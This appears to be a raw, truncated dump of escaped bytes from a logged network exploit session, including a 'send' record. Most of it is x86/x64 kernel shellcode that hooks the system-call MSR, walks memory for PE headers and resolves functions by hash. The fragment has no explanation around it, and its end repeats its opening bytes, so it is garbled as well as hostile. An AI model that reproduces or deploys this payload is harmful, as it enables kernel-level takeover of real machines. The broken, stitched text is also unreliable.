H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\x
f8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xe
b\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\
\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x
00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\
\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 20, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\
\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\
\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea 
H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\